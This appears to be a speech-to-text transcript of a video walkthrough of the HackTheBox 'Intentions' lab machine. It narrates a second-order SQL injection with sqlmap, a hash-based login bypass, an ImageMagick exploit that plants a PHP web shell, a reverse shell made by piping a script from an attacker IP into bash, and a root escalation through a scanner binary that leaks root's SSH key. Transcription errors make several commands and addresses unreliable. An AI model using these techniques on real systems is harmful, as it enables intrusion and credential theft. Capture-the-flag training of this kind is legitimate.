Hello and welcome to Pentest blog. Today we are going to see the intentions from HackTheBox, which is a hard Linux machine that starts with a second order SQL injection, and after that we will get some juicy info to get admin rights on the portal, and there we would find an Imagick vulnerability through which we can get inside the box. After that we can exploit a functionality of a binary and through which we can get root access. So let's jump in. So at first we will start with port scanning, and for that we are always using rust scan, and our target is 10 10 11 220. We will also use nmap default scanners like -sc for default nmap scripts, -sd for default versions, and we will save the output to a folder nmap initial scan, and rust can found two ports open, that is 22 for ssh and port 80 for the web application. So we will first start with the web app, and we will route the traffic through Bobsuit. Okay, so there is a nice login page and we can register also. So let's start register. Before that we can start our enumeration. So of -u for the URL, and we would like to first and user their checklist. We will going to checklist, discovery, web content, and draft, medium directories. And as we can see, there are quite a few directories are there: admin, logout, gallery, funds. Okay, let's run this in the background, and till then we can register here. So name is beast, email beast @htb.eu beast, and we will give beast register and completion. Let's log in beast @htb.eu beast, and we are inside the portal. Let's see. So there is an image gallery. Okay, your feed. Okay, your profile. Okay, so we can update the genres here. So what we can do, like books, that, and the results are shown in here. So we are updating in this page, that is the feed page, and we are updating in the profile page, and we are getting, and the result we are getting from the feed page. Okay, so what we can do, like this thing, let's see the burp logs, API v1. We can try some SQL injection in here. So this is a second order SQL injection. So what we can do, SQL map, and we will go to the GitHub, and we will find some users manual. Okay, and we will find order second order attack. So we can provide the URL or we can provide the request. So what we will do, we have the request to update our geners, so we can copy this, we can copy update.req, we will save it, and the second point that we will get this thing. So save to copy to file, and we will get fields.req. Here we will cancel this. Until then, like over here, SQL map minus request, and that is the update. Second request is equal to field batch. Since the SQL map is running, what we can do is we can see, so copy URL. So let's check if there is an other version of the API. So F2 equal v2, and I think it's what we can do, we can use the of minus u and pause user share checklist discovery web content and raft medium directories dot text. Okay, let's run it. Till then we will see if SQL map has found anything. It's not finding anything. What we can do is user login register. We can copy URL. So we can see like the API endpoint is there, but what we will, let's check to version 2. Let's check to version 3. Okay, so version 3, we are getting different response from version 3, that is 404, that is the URL do not exist. Okay, we will quit and update. Let's edit this thing little bit. Star. So we have provided a star for SQL map to identify the injection point. Second thing is we will start a risk or label is equal to 2. Okay, so as we can see that it has identified an injection point. So what we will do, label to batch, and we will dump the database. And it has found two databases, that is information schema and intentions. We are more interested in intentions, so copy and tables. Let's see if it can find any tables. Yes, that is gallery, images, migrations, and the users. So we will enumerate the users table, users, and we will dump the whole table. And as we can see, here are two users who belongs to intentions box, that is Steve intentions.htb and Greg intentions.htb. So we will copy these things and paste. Another thing is it's hash for Steve, and one thing is the Greg thing. And for the Greg user, we will also save his credential. Second endpoint that we have seen, like there is a second version of the API also. So we will go with beast at the rate htb.eu beast. And what we can do, and as we have seen, like there is an admin section also. So if we go here and type admin, we are redirected to the login page. So means the regular user that we are creating do not have admin access. So let's check beast at the rate htb.eu beast, and we will intercept this request. So we will go to intercept this thing, sign in, and we will change it to b2, and we will send it to repeater, send. And as we can see, the hash field is required. So we are providing password, this must be hash, login error. What we can do, we can try from this thing. So first we will try with the Steve that we have got from SQL injection, and his hash, and let's send it. And we are logged in, meaning this is working perfect. So what we will do, we will change it to hash, provide the hash, and here it will be Steve at the rate intentions.tb, and that is v2. So let's, and we are logged in. Let's see now if we have admin access. So we are now admin. We can see the logged in users, that is Steve, Greg. So there is a legal notice and v2 API endpoint. The most important message is this thing. The v2 API comes with some neat features we are testing, and image container tab, no container. Okay, so we'll go here charcoal, and as you can see the image has been modified. So this is using image magic class to do this modification. So we will go here and type php image magic exploit, and pt so on is the blog. And as we go further we will see like there is an image magic extension vulnerability. So what is doing, Jadley path php brood. Okay, so we can see like it's using caption to read the file with a php single line command to get a cell, and it's writing using the info, and it's using the multi-part form data boundary. So first we will create this xml version and let's see if it's using in our case. So we will go here, file, new file. Okay, so we need to find the directory that we need to write. So go here, that is post modify, and it's using the path var html storage app public. So we will use this thing, control C, public, and cell.php. Okay, so this is the command we need to write. So we will save it to a file, pi payload.msl. Let's try this payload. So what we can do, let's see what it's doing. So it's using this scope, and here vidmsl temp php. So for that thing we will inspect network, and we will copy as curl, and file new, we'll paste it. We will remove this thing, post, we will remove the user agent, content type, and we will remove this thing also. Now we will append our payload. So for that, what we'll know, f, that is type is equal is a type or something else, path. Path is equal to vid msl tmp php and the wildcard. Then again effect is equal to charcoal minus f, file is equal to at the rate payload.msl. Okay, let's use this thing. Till then we can copy it, copy selection for here's this storage, and we have named cell.php, and our a is equal to id. Okay, so there is only caption thing we are getting. So there is, I think there is some error in this. So we are going to change it to pass through. Let's see, vi payload.msl, no line buffer, copy, and our cell has been uploaded. So what we will do, we will get a reversal. We'll copy this thing, and here whole v, we will give it our ip, that is 10.10.14.131, and port is 9001. We will change it to pass, and we will save it here like cell.sh. Okay, srv 80, and 1001. Curl, and for the space we will url encode the space http 10.10.11.131 cell.sh, and we will pipe it to bash. Okay, 10.10.14. And we got a hit here, let's see, and we are inside the box. So first we will see which python version is there, and python 3, Python 3, we will stabilize the cell. -c import pty dot on bin bash and control z stt y raw minus echo fg. Okay, and we are git ignore animals. There is a git ignore file, so there must be a .git. Let's see. And here is the .git. So first we will check git log, copy paste. Okay, so we don't have right in this directory. What we can do, we can export our home to temp and we can paste this thing success. Okay, home temp and git log, enter, and this commit fix web back for production, that is done by Steve, and this commit is done by Greg. So let's inspect this thing. Git so the commit id, enter, and we can see there is an password for the Greg user. So we'll copy it and we will save it here. So Greg, control V, and we will try to log in with the SSH. SSH Greg at the rate 10 10 14 11 220. Not grep, it should be Greg. And we will paste the password, and we are in. Here is the user.txt, and we can see there are two interesting files that are owned by root. So let's see, cat dm check, and it's running a binary. Let's check this thing, cat dmca hashes. ls la opt scanner, and there is a scanner file. Let's see, file opt scanner and scanner, that is 64 bit cat dmca check, and it's running this command. We will use the same thing. Okay, so dmca, this is the level, matches, jpg. We cannot access this folder, but using this scanner we can access this folder. Okay, so we can use this to read the IDRSA key of the root. So to do that, let's first see what are the options it has. Okay. Okay, so it's creating the hash file in this, like this plus sign, label, matches, and the file name that we have seen in here. Okay. So what we will do, we will first create a Python script. So this is the final script. Now what we will do, we will copy this and we will paste inside this box. So let's see, there's nothing like nano root.py. Control X, shift Y, yes, Python 3 root.py, and we have a error. So nano root.py. At the same time we will change it to false. Control X. as result true. Okay, here. And we got the root hash IDRSA. What we can do, we can copy this and save it locally. So vi IDRSA, paste it, save it, change the permission to 600 and SSH minus I IDRSA root at the rate 10 10 14 no 11 220, and we are root. We can see the root.txt in here. You can submit it to own the box in Hack the Box. If you like this video, please vote this up and subscribe to this channel so that I can make more videos like this. And please let us know your views on in the comment section below. Till then, keep hacking. Bye bye.